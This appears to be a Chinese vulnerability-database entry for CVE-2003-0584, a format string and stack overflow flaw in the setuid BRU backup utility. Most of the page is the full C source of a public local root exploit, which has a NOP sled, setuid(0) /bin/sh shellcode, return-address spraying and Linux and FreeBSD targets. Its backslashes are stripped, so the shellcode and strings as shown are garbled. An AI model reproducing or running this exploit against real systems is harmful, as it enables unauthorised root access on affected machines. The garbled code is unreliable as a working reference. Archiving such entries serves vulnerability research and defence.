Unix (BRU)格式字符串漏洞
漏洞ID | 1107416 | 漏洞类型 | 格式化字符串 |
发布时间 | 2003-07-16 | 更新时间 | 2003-08-18 |
CVE编号 | CVE-2003-0584 |
CNNVD-ID | CNNVD-200308-099 |
漏洞平台 | Unix | CVSS评分 | 7.2 |
|漏洞来源
|漏洞详情
Unix(BRU)17.0版本及之前版本的Backup和RestoreUtility在运行setuid时存在格式字符串漏洞。本地用户可以借助命令行参数中的格式字符串说明符执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/8215/info
It has been reported that BRU may not properly parse commandline arguments, potentially leading to at least two vectors of exploitation. It may be possible for local attackers to conduct format string-based attacks as well as buffer overflow-based attacks.
It should be noted that although BRU does not ship with the suid bit set by default, documentation within the software may instruct users to enable it.
/** EST BRU(TM) Backup and Restore Utility Local Root Exploit
**
** By: [email protected]
**
** Simple Stack overflow Wont say any more :P
**
** Linux & FreeBsd Targets
**
** Greetz: sam,flatline,v0id,#!l33tsecurity@efnet,KF,b0iler,schlumpf,kokanin,DSR
**
** Public Release
** L33tsecurity 2003; irc.secsup.org #l33tsecurity
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/errno.h>
#define FUN "./bru"
char shellcode[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
/* SETUID(0) SHELLCODE LINUX */
"xfcxfcxfcxfcxfcxfcxfcxfcxfcxfcxfcxfc"
"x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x50x68x2fx2f"
"x73x68x68x2fx62x69x6ex89xe3x8dx54x24x08x50x53x8d"
"x0cx24xb0x0bxcdx80x31xc0xb0x01xcdx80";
unsigned long sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char **argv) {
char buffer[9000];
int x,target;
char *env[2];
char *args[24];
unsigned long ret = 0xbffffffa - strlen(shellcode) - strlen(FUN);
int *ptr = (int *)(buffer);
if (argc != 2) {
usage();
exit(0);
}
target = atoi(argv[1]);
if (target == 0) {
for (x=0; x<9000 ; x+=4)
*ptr++ = (ret + 1);
}
if (target == 1) {
for (x=0; x<3500 ; x+=4)
*ptr++ = 0xbfbffe48;
}
/* put in env */
env[0] = shellcode;
env[1] = NULL;
args[0] = FUN;
args[1] = buffer;
args[2] = NULL;
execve (args[0], args, env);
perror ("execve");
}
int usage() {
printf("EST BRU(TM)local root exploitn");
printf("By: [email protected]");
printf("Usage: ./ex_bru targetn");
printf("TARGET LIST:n");
printf("0. LINUXn1. FREEBSDn");
return 0;
}
|受影响的产品
Tolis Group BRU 17.0
|参考资料
来源:BUGTRAQ
名称:20030716SRT2003-07-16-0358-bruhasbufferoverflowandformatissues
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105846288808846&w;=2
相关推荐: pMachine Search Module Cross-Site Scripting Vulnerability
pMachine Search Module Cross-Site Scripting Vulnerability 漏洞ID 1100002 漏洞类型 Input Validation Error 发布时间 2003-06-19 更新时间 2003-06-19…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666